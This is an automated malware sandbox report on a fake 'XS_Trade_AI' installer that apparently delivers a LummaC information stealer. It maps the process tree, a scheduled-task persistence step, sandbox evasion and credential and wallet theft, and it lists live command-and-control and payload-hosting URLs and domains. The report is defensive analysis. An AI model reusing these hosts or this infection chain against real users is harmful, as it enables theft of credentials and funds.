      Remote Access Functionality

      Source: Yara match | File source: decrypted.memstr, type: MEMORYSTR
      Source: Yara match | File source: sslproxydump.pcap, type: PCAP
      Mitre Att&ck Matrix (techniques listed per tactic column; a number in front of a technique is the count marker shown in the matrix for that technique)

      Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
      Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
      Initial Access: 1 Spearphishing Link; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
      Execution: 31 Windows Management Instrumentation; 1 Native API; 12 Command and Scripting Interpreter; 1 Scheduled Task/Job; 1 PowerShell; Scheduled Task; Systemd Timers; Container Orchestration Job
      Persistence: 1 DLL Side-Loading; 1 Scheduled Task/Job; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
      Privilege Escalation: 1 DLL Side-Loading; 1 Access Token Manipulation; 312 Process Injection; 1 Scheduled Task/Job; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
      Defense Evasion: 11 Deobfuscate/Decode Files or Information; 3 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading; 1 Masquerading; 12 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 312 Process Injection
      Credential Access: 2 OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
      Discovery: 2 System Time Discovery; 3 File and Directory Discovery; 47 System Information Discovery; 241 Security Software Discovery; 12 Virtualization/Sandbox Evasion; 2 Process Discovery; 2 System Owner/User Discovery; System Owner/User Discovery
      Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
      Collection: 1 Archive Collected Data; 3 Data from Local System; 1 Screen Capture; 2 Clipboard Data; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
      Command and Control: 1 Ingress Tool Transfer; 21 Encrypted Channel; 3 Non-Application Layer Protocol; 114 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
      Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
      Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      Behavior Graph ID: 1543888 | Sample: XS_Trade_AI-newest_release_.exe | Startdate: 28/10/2024 | Architecture: WINDOWS | Score: 100

      Start node
        DNS/IP: revordirecut.cyou; tinyurl.com; 2 other IPs or domains
        Signatures: Suricata IDS alerts for network traffic; Found malware configuration; Sigma detected: Scheduled temp file as task from temp location; 4 other signatures
        Started: taskshosts.exe (22); XS_Trade_AI-newest_release_.exe (2); taskshosts.exe (22)

      taskshosts.exe (22), first instance
        Dropped: C:\Users\user\AppData\...\unicodedata.pyd (PE32); C:\Users\user\AppData\Local\...\select.pyd (PE32); C:\Users\user\AppData\Local\...\python39.dll (PE32); 17 other files (none is malicious)
        Started: taskshosts.exe
          Signatures: Writes to foreign memory regions; Allocates memory in foreign processes; Injects a PE file into a foreign processes
          Started: ngentask.exe
            DNS/IP: revordirecut.cyou 104.21.83.166, 443, 49743, 49744 CLOUDFLARENETUS United States
            Signatures: Query firmware table information (likely to detect VMs); Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc); Tries to steal Crypto Currency Wallets

      XS_Trade_AI-newest_release_.exe (2)
        Dropped: C:\Users\...\XS_Trade_AI-newest_release_.tmp (PE32)
        Started: XS_Trade_AI-newest_release_.tmp (3 13)
          Dropped: C:\Users\user\AppData\Local\Temp\...\idp.dll (PE32); C:\Users\user\AppData\Local\...\_setup64.tmp (PE32+); C:\Users\user\AppData\...\DontSleep_x64.exe (PE32+)
          Signatures: Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
          Started: XS_Trade_AI-newest_release_.exe (2)
            Dropped: C:\Users\...\XS_Trade_AI-newest_release_.tmp (PE32)
            Started: XS_Trade_AI-newest_release_.tmp (3 22)
              DNS/IP: rentry.org 164.132.58.105, 443, 49734 OVHFR France; dl.jrdesklabs.com 135.181.116.240, 443, 49735, 49736 HETZNER-ASDE Germany; tinyurl.com 104.18.111.161, 443, 49733 CLOUDFLARENETUS United States
              Dropped: C:\Users\user\AppData\Local\Temp\...\lang (XML); C:\Users\user\AppData\Local\Temp\...\idp.exe (PE32); C:\Users\user\AppData\Local\Temp\...\idp.dll (PE32); 2 other files (none is malicious)
              Signatures: Uses schtasks.exe or at.exe to add and modify task schedules
              Started: cmd.exe (1); idp.exe (2); cmd.exe (1); schtasks.exe (1)
                cmd.exe (1): Signatures: Uses attrib.exe to hide files | Started: conhost.exe; attrib.exe (1)
                idp.exe (2): Dropped: C:\Users\user\AppData\Local\...\yyttrsu.exe (PE32) | Started: conhost.exe
                cmd.exe (1): Started: conhost.exe
                schtasks.exe (1): Started: conhost.exe

      taskshosts.exe (22), second instance
        Dropped: C:\Users\user\AppData\...\unicodedata.pyd (PE32); C:\Users\user\AppData\Local\...\select.pyd (PE32); C:\Users\user\AppData\Local\...\python39.dll (PE32); 17 other files (none is malicious)
        Signatures: Found pyInstaller with non standard icon
        Started: taskshosts.exe
          Signatures: LummaC encrypted strings found
          Started: ngentask.exe

      Source | Detection | Scanner | Label | Link
      XS_Trade_AI-newest_release_.exe | 0% | ReversingLabs
      Source | Detection | Scanner | Label | Link
      C:\Users\user\AppData\Local\Temp\_MEI78242\VCRUNTIME140.dll | 0% | ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI78242\_asyncio.pyd | 0% | ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI78242\_bz2.pyd | 0% | ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI78242\_ctypes.pyd | 0% | ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI78242\_decimal.pyd | 0% | ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI78242\_hashlib.pyd | 0% | ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI78242\_lzma.pyd | 0% | ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI78242\_multiprocessing.pyd | 0% | ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI78242\_overlapped.pyd | 0% | ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI78242\_queue.pyd | 0% | ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI78242\_socket.pyd | 0% | ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI78242\_ssl.pyd | 0% | ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI78242\_uuid.pyd | 0% | ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI78242\libcrypto-1_1.dll | 0% | ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI78242\libffi-7.dll | 0% | ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI78242\libssl-1_1.dll | 0% | ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI78242\pyexpat.pyd | 0% | ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI78242\python39.dll | 0% | ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI78242\select.pyd | 0% | ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI78242\unicodedata.pyd | 0% | ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI80162\VCRUNTIME140.dll | 0% | ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI80162\_asyncio.pyd | 0% | ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI80162\_bz2.pyd | 0% | ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI80162\_ctypes.pyd | 0% | ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI80162\_decimal.pyd | 0% | ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI80162\_hashlib.pyd | 0% | ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI80162\_lzma.pyd | 0% | ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI80162\_multiprocessing.pyd | 0% | ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI80162\_overlapped.pyd | 0% | ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI80162\_queue.pyd | 0% | ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI80162\_socket.pyd | 0% | ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI80162\_ssl.pyd | 0% | ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI80162\_uuid.pyd | 0% | ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI80162\libcrypto-1_1.dll | 0% | ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI80162\libffi-7.dll | 0% | ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI80162\libssl-1_1.dll | 0% | ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI80162\pyexpat.pyd | 0% | ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI80162\python39.dll | 0% | ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI80162\select.pyd | 0% | ReversingLabs
      C:\Users\user\AppData\Local\Temp\_MEI80162\unicodedata.pyd | 0% | ReversingLabs
      C:\Users\user\AppData\Local\Temp\is-342QK.tmp\DontSleep_x64.exe | 0% | ReversingLabs
      C:\Users\user\AppData\Local\Temp\is-342QK.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs
      C:\Users\user\AppData\Local\Temp\is-342QK.tmp\idp.dll | 0% | ReversingLabs
      C:\Users\user\AppData\Local\Temp\is-5ULBA.tmp\XS_Trade_AI-newest_release_.tmp | 2% | ReversingLabs
      C:\Users\user\AppData\Local\Temp\is-7K4JS.tmp\XS_Trade_AI-newest_release_.tmp | 2% | ReversingLabs
      C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\DontSleep_x64.exe | 0% | ReversingLabs
      C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\_isetup\_setup64.tmp | 0% | ReversingLabs
      C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.dll | 0% | ReversingLabs
      C:\Users\user\AppData\Local\Temp\is-M2GGN.tmp\idp.exe | 0% | ReversingLabs
      No Antivirus matches
      No Antivirus matches
      Source | Detection | Scanner | Label | Link
      http://schemas.micro | 0% | URL Reputation | safe
      http://crl.thawte.com/ThawteTimestampingCA.crl0 | 0% | URL Reputation | safe
      http://www.innosetup.com/ | 0% | URL Reputation | safe
      http://ocsp.thawte.com0 | 0% | URL Reputation | safe
      https://www.openssl.org/H | 0% | URL Reputation | safe
      http://www.remobjects.com/ps | 0% | URL Reputation | safe
      Name | IP | Active | Malicious | Antivirus Detection | Reputation
      tinyurl.com | 104.18.111.161 | true | false | | unknown
      revordirecut.cyou | 104.21.83.166 | true | true | | unknown
      rentry.org | 164.132.58.105 | true | false | | unknown
      dl.jrdesklabs.com | 135.181.116.240 | true | false | | unknown
      Name | Malicious | Antivirus Detection | Reputation
      contemteny.site | true | | unknown
      https://dl.jrdesklabs.com/yyttrsu.zip | false | | unknown
      opposezmny.site | true | | unknown
      servicedny.site | true | | unknown
      https://revordirecut.cyou/api | true | | unknown
      goalyfeastz.site | true | | unknown
      https://tinyurl.com/ec75f7fn | false | | unknown
      https://rentry.org/55d46ea0c6e974cfc3e82261dac14874a7dd1da6cfe830e2d9f1bdd748695419/raw | false | | unknown
      authorisev.site | true | | unknown
      faulteyotk.site | true | | unknown
      seallysl.site | true | | unknown
      revordirecut.cyou | true | | unknown
      dilemmadu.site | true | | unknown
      Name | Source | Malicious | Antivirus Detection | Reputation
      https://www.ntcore.com/files/richsign.htm | taskshosts.exe | false | | unknown
      https://dl.jrdesklabs.com/Y | XS_Trade_AI-newest_release_.tmp | false | | unknown
      https://www.python.org/download/releases/2.3/mro/. | taskshosts.exe | false | | unknown
      http://www.jrsoftware.org/ishelp/index.php?topic=setupcmdlineSetupU | XS_Trade_AI-newest_release_.exe | false | | unknown
      https://rentry.org/55d46ea0c6e974cfc3eXy | XS_Trade_AI-newest_release_.tmp | false | | unknown
      https://github.com/tensorflow/datasets/blob/master/tensorflow_datasets/core/utils/resource_utils.py# | taskshosts.exe | false | | unknown
      http://schemas.micro | XS_Trade_AI-newest_release_.tmp | false | URL Reputation: safe | unknown
      http://crl3.digi | taskshosts.exe | false | | unknown
      http://www.kymoto.orgq | XS_Trade_AI-newest_release_.tmp | false | | unknown
      https://dl.jrdesklabs.com/yyttrsu.zipUU | XS_Trade_AI-newest_release_.tmp | false | | unknown
      https://revordirecut.cyou/api9 | ngentask.exe | false | | unknown
      https://revordirecut.cyou/ | ngentask.exe | false | | unknown
      http://crl.thawte.com/ThawteTimestampingCA.crl0 | taskshosts.exe | false | URL Reputation: safe | unknown
      http://www.resplendence.com/ | XS_Trade_AI-newest_release_.exe, XS_Trade_AI-newest_release_.tmp | false | | unknown
      http://crl4.digice | taskshosts.exe | false | | unknown
      https://www.mandiant.com/resources/blog/tracking-malware-import-hashing | taskshosts.exe | false | | unknown
      http://schemas.microsoft.co | XS_Trade_AI-newest_release_.tmp | false | | unknown
      https://tinyurl.com/ | XS_Trade_AI-newest_release_.tmp | false | | unknown
      http://www.innosetup.com/ | XS_Trade_AI-newest_release_.exe, XS_Trade_AI-newest_release_.tmp, XS_Trade_AI-newest_release_.tmp.0.dr | false | URL Reputation: safe | unknown
      https://github.com/python/cpython/blob/3.9/Lib/importlib/_bootstrap_external.py#L679-L688 | taskshosts.exe | false | | unknown
      https://rentry.org/55d46ea0c6e974cfc3e | XS_Trade_AI-newest_release_.tmp | false | | unknown
      https://revordirecut.cyou/apiFX | ngentask.exe | false | | unknown
      https://auscitte.github.io/systems%20blog/Exception-Directory-pefile#implementation-details | taskshosts.exe | false | | unknown
      http://www.kymoto.orgAbout | XS_Trade_AI-newest_release_.exe, XS_Trade_AI-newest_release_.tmp | false | | unknown
      http://ocsp.thawte.com0 | taskshosts.exe | false | URL Reputation: safe | unknown
      https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/reader | taskshosts.exe | false | | unknown
      https://www.python.org/dev/peps/pep-0205/ | taskshosts.exe | false | | unknown
      https://revordirecut.cyou:443/api | ngentask.exe | false | | unknown
      http://www.kymoto.org | XS_Trade_AI-newest_release_.exe | false | | unknown
      http://schemas.micr | XS_Trade_AI-newest_release_.tmp | false | | unknown
      http://jrsoftware.github.io/issrc/ISHelp/isxfunc.xml | XS_Trade_AI-newest_release_.exe, XS_Trade_AI-newest_release_.tmp | false | | unknown
                                                                                              https://github.com/Unidata/MetPy/blob/a3424de66a44bf3a92b0dcacf4dff82ad7b86712/src/metpy/plots/wx_sytaskshosts.exe, 00000010.00000003.1946767372.0000000000C74000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1945308077.0000000000C74000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1948778563.0000000000C69000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1944431721.0000000000C74000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1944137115.0000000000C74000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1946211095.0000000000C74000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1943811652.0000000000C78000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1945604788.0000000000C74000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1940817547.0000000000C74000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1946363592.0000000000C74000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1948914833.0000000000C73000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1943649915.0000000000C74000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1943771821.0000000000C76000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000002.1977397483.0000000000C72000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1974621104.0000000000C71000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1942121225.0000000000C38000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1944747106.0000000000C74000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 
00000010.00000003.1943980082.0000000000C74000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1943181254.0000000000C75000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000010.00000003.1974481328.0000000000C3A000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000014.00000003.2028961462.0000000000D63000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                https://dl.jrdesklabs.com/XS_Trade_AI-newest_release_.tmp, XS_Trade_AI-newest_release_.tmp, 00000003.00000003.1920787287.00000000009F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  http://127.0.0.1/innosetup/index.htmXS_Trade_AI-newest_release_.exe, 00000000.00000003.1783740961.0000000002510000.00000004.00001000.00020000.00000000.sdmp, XS_Trade_AI-newest_release_.tmp, 00000001.00000003.1828489513.000000007FBD0000.00000004.00001000.00020000.00000000.sdmp, XS_Trade_AI-newest_release_.tmp, 00000001.00000003.1830205872.000000007FC20000.00000004.00001000.00020000.00000000.sdmp, XS_Trade_AI-newest_release_.tmp, 00000001.00000003.1789233262.0000000003490000.00000004.00001000.00020000.00000000.sdmp, XS_Trade_AI-newest_release_.tmp, 00000003.00000003.1904656093.000000007F4F0000.00000004.00001000.00020000.00000000.sdmp, XS_Trade_AI-newest_release_.tmp, 00000003.00000003.1906019015.000000007F720000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    https://www.openssl.org/Htaskshosts.exe, 0000000F.00000003.1930222401.000000000099D000.00000004.00000020.00020000.00000000.sdmp, taskshosts.exe, 00000013.00000003.2018519903.000000000124F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    • URL Reputation: safe
                                                                                                    unknown
                                                                                                    http://crl3.digi_taskshosts.exe, 00000013.00000003.2015504389.000000000124D000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      unknown
                                                                                                      http://www.remobjects.com/psXS_Trade_AI-newest_release_.exe, 00000000.00000003.1785573250.000000007F9B0000.00000004.00001000.00020000.00000000.sdmp, XS_Trade_AI-newest_release_.exe, 00000000.00000003.1785088094.0000000002510000.00000004.00001000.00020000.00000000.sdmp, XS_Trade_AI-newest_release_.tmp, 00000001.00000000.1786925633.0000000000401000.00000020.00000001.01000000.00000004.sdmp, XS_Trade_AI-newest_release_.tmp.0.drfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      https://github.com/python/cpython/blob/839d7893943782ee803536a47f1d4de160314f85/Lib/importlib/abc.pytaskshosts.exe, 00000014.00000002.2063418093.0000000000D27000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        unknown
                                                                                                        http://localhost:8191/index.htmlXS_Trade_AI-newest_release_.tmp, 00000001.00000003.1828839852.00000000035D0000.00000004.00001000.00020000.00000000.sdmpfalse
                                                                                                          unknown
IP | Domain | Country | ASN | ASN Name | Malicious
164.132.58.105 | rentry.org | France | 16276 | OVHFR | false
104.18.111.161 | tinyurl.com | United States | 13335 | CLOUDFLARENETUS | false
104.21.83.166 | revordirecut.cyou | United States | 13335 | CLOUDFLARENETUS | true
135.181.116.240 | dl.jrdesklabs.com | Germany | 24940 | HETZNER-ASDE | false
Joe Sandbox version: 41.0.0 Charoite
Analysis ID: 1543888
Start date and time: 2024-10-28 15:48:36 +01:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 9m 8s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed: 24
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Sample name: XS_Trade_AI-newest_release_.exe
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@31/56@4/4
EGA Information:
• Successful, ratio: 80%
HCA Information:
• Successful, ratio: 98%
• Number of executed functions: 94
• Number of non-executed functions: 197
Cookbook Comments:
• Found application associated with file extension: .exe
• Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
• Execution Graph export aborted for target XS_Trade_AI-newest_release_.tmp, PID 7424 because there are no executed functions
• Not all processes were analyzed; the report is missing behavior information
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.
• Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
• VT rate limit hit for: XS_Trade_AI-newest_release_.exe
Time | Type | Description
10:49:46 | API Interceptor | 2x Sleep call for process: XS_Trade_AI-newest_release_.tmp modified
10:50:06 | API Interceptor | 7x Sleep call for process: ngentask.exe modified
14:49:52 | Task Scheduler | Run new task: DropboxSyncTaskMachineUA path: %localappdata%\programs\common\taskshosts.exe
Match | Associated Sample Name / URL | Detection | Threat Name | Context
164.132.58.105 | sims-4-updater-v1.3.4.exe | malicious | Unknown |
164.132.58.105 | RedEngine.exe | malicious | Babadeda, RedLine |
164.132.58.105 | setup.exe | malicious | Babadeda, RHADAMANTHYS, RedLine |
164.132.58.105 | 8MO5hfPa8d.exe | malicious | AsyncRAT, Clipboard Hijacker |
164.132.58.105 | SecuriteInfo.com.HEUR.Trojan.MSIL.Agent.gen.12009.5536.exe | malicious | AsyncRAT, Clipboard Hijacker |
164.132.58.105 | DLL_Injector_Resou_nls..scr.exe | malicious | AsyncRAT, Clipboard Hijacker, zgRAT |
164.132.58.105 | SynapseX_injector.exe | malicious | Python Stealer, MicroClip |
164.132.58.105 | 2PKbNS1Q41.exe | malicious | Python Stealer |
164.132.58.105 | 3yypk0NA7b.exe | malicious | Unknown |
164.132.58.105 | 1budjNuX0E.exe | malicious | Unknown |
104.18.111.161 | vF20HtY4a4.exe | malicious | Unknown | tinyurl.com/bdhpvpny
104.18.111.161 | VvPrGsGGWH.exe | malicious | AsyncRAT, XWorm | tinyurl.com/muewsc78
104.18.111.161 | 5UIy3bo46y.dll | malicious | Unknown | tinyurl.com/yeykydun
104.18.111.161 | BeginSync lnk.lnk | malicious | Unknown | tinyurl.com/yeykydun
104.18.111.161 | SecuriteInfo.com.Win64.MalwareX-gen.11827.5130.dll | malicious | AsyncRAT, XWorm | tinyurl.com/yk3s8ubp
Match | Associated Sample Name / URL | Detection | Threat Name | Context
tinyurl.com | https://2007.filemail.com/api/file/get?filekey=58mKUrTMdlmzqkRvo0UdVa2TMjJTCQiSNv5rUBtsDQTNU0dM4JzppUJaOrP_mWxCym0k9l5xEDeaXunPsHq6frY8XZH_gnclw86MefA3bpAlGuDkr77-xSqrMOQIlMdW5cRjwoOSCWIlTwpC48cNKMMHhMKp&track=P8fpm4ry&pk_vid=8a8b18f03738ae4f17297703684d559d | malicious | HTMLPhisher | 104.17.112.233
tinyurl.com | http://hotautodetail.com/goe-=bleass=america=donal=q82h-=1 | malicious | Unknown | 104.18.111.161
tinyurl.com | vF20HtY4a4.exe | malicious | Unknown | 104.17.112.233
tinyurl.com | vF20HtY4a4.exe | malicious | Unknown | 104.18.111.161
tinyurl.com | VvPrGsGGWH.exe | malicious | AsyncRAT, XWorm | 104.18.111.161
tinyurl.com | 5UIy3bo46y.dll | malicious | Unknown | 104.18.111.161
tinyurl.com | HQsitBLlOv.dll | malicious | Unknown | 104.17.112.233
tinyurl.com | BeginSync lnk.lnk | malicious | Unknown | 104.18.111.161
tinyurl.com | https://tinyurl.com/y9r5fvas | malicious | Unknown | 104.17.112.233
tinyurl.com | https://tinyurl.com/5xa2ubd7 | malicious | Unknown | 104.17.112.233
rentry.org | sims-4-updater-v1.3.4.exe | malicious | Unknown | 164.132.58.105
rentry.org | RedEngine.exe | malicious | Babadeda, RedLine | 164.132.58.105
rentry.org | AtlasLoader.exe | malicious | Unknown | 198.251.88.130
rentry.org | AtlasLoader.exe | malicious | Unknown | 198.251.88.130
rentry.org | LX.exe | malicious | Unknown | 198.251.88.130
rentry.org | lucim.exe | malicious | Xmrig | 198.251.88.130
rentry.org | Activator.exe | malicious | Xmrig | 198.251.88.130
rentry.org | EzLoader.exe | malicious | RHADAMANTHYS, Xmrig | 198.251.88.130
rentry.org | LolixLoader.exe | malicious | RHADAMANTHYS | 198.251.88.130
rentry.org | gnu128gsui782.exe | malicious | Laplas Clipper, RHADAMANTHYS | 107.189.8.5
                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                              CLOUDFLARENETUShttps://gofile.io/d/IAr464Get hashmaliciousUnknownBrowse
                                                                                                                              • 172.67.134.234
                                                                                                                              rpurchasyinquiry.exeGet hashmaliciousFormBookBrowse
                                                                                                                              • 172.67.148.133
                                                                                                                              https://gofile.io/d/IAr464Get hashmaliciousPhisherBrowse
                                                                                                                              • 104.21.25.239
                                                                                                                              https://dl.dropboxusercontent.com/scl/fi/95is2w1ywjvorzayt88dp/DKM-0192PDF.zip?rlkey=svoej4s4tb5lwbnvthtgrmokl&st=d99zdn1k&dl=0Get hashmaliciousAbobus ObfuscatorBrowse
                                                                                                                              • 104.16.230.132
                                                                                                                              https://gofile.io/d/IAr464Get hashmaliciousUnknownBrowse
                                                                                                                              • 188.114.97.3
                                                                                                                              file.exeGet hashmaliciousLummaCBrowse
                                                                                                                              • 188.114.96.3
                                                                                                                              EwKKdCrEDu.exeGet hashmaliciousUnknownBrowse
                                                                                                                              • 188.114.96.3
                                                                                                                              EwKKdCrEDu.exeGet hashmaliciousUnknownBrowse
                                                                                                                              • 188.114.97.3
                                                                                                                              Salary_Structure_Benefits_for_I.e.van.groenesteinIyNURVhUTlVNUkFORE9NMTkjIw==.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                              • 104.17.25.14
                                                                                                                              Salary_Structure_Benefits_for_SridenourIyNURVhUTlVNUkFORE9NMTkjIw==.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                              • 188.114.96.3
OVHFR
  https://gofile.io/d/IAr464 | malicious | Unknown | 51.75.242.210
  rpurchasyinquiry.exe | malicious | FormBook | 176.31.209.107
  https://gofile.io/d/IAr464 | malicious | Phisher | 51.75.242.210
  https://gofile.io/d/IAr464 | malicious | Unknown | 51.75.242.210
  nabarm5.elf | malicious | Unknown | 176.31.46.106
  la.bot.sparc.elf | malicious | Unknown | 51.255.137.225
  nabmips.elf | malicious | Unknown | 51.77.11.185
  la.bot.arm7.elf | malicious | Unknown | 54.36.111.116
  jklmips.elf | malicious | Unknown | 51.81.7.180
  splarm5.elf | malicious | Unknown | 178.32.165.89
CLOUDFLARENETUS
  https://gofile.io/d/IAr464 | malicious | Unknown | 172.67.134.234
  rpurchasyinquiry.exe | malicious | FormBook | 172.67.148.133
  https://gofile.io/d/IAr464 | malicious | Phisher | 104.21.25.239
  https://dl.dropboxusercontent.com/scl/fi/95is2w1ywjvorzayt88dp/DKM-0192PDF.zip?rlkey=svoej4s4tb5lwbnvthtgrmokl&st=d99zdn1k&dl=0 | malicious | Abobus Obfuscator | 104.16.230.132
  https://gofile.io/d/IAr464 | malicious | Unknown | 188.114.97.3
  file.exe | malicious | LummaC | 188.114.96.3
  EwKKdCrEDu.exe | malicious | Unknown | 188.114.96.3
  EwKKdCrEDu.exe | malicious | Unknown | 188.114.97.3
  Salary_Structure_Benefits_for_I.e.van.groenesteinIyNURVhUTlVNUkFORE9NMTkjIw==.html | malicious | HTMLPhisher | 104.17.25.14
  Salary_Structure_Benefits_for_SridenourIyNURVhUTlVNUkFORE9NMTkjIw==.html | malicious | HTMLPhisher | 188.114.96.3
HETZNER-ASDE
  https://gofile.io/d/IAr464 | malicious | Unknown | 213.239.209.209
  https://gofile.io/d/IAr464 | malicious | Phisher | 144.76.38.164
  https://gofile.io/d/IAr464 | malicious | Unknown | 213.239.209.209
  nabspc.elf | malicious | Unknown | 176.9.43.60
  la.bot.arm7.elf | malicious | Unknown | 116.203.104.203
  CQlUZ4KuAa.exe | malicious | Vidar | 116.202.182.67
  9yJSTTEg68.exe | malicious | Vidar | 135.181.31.18
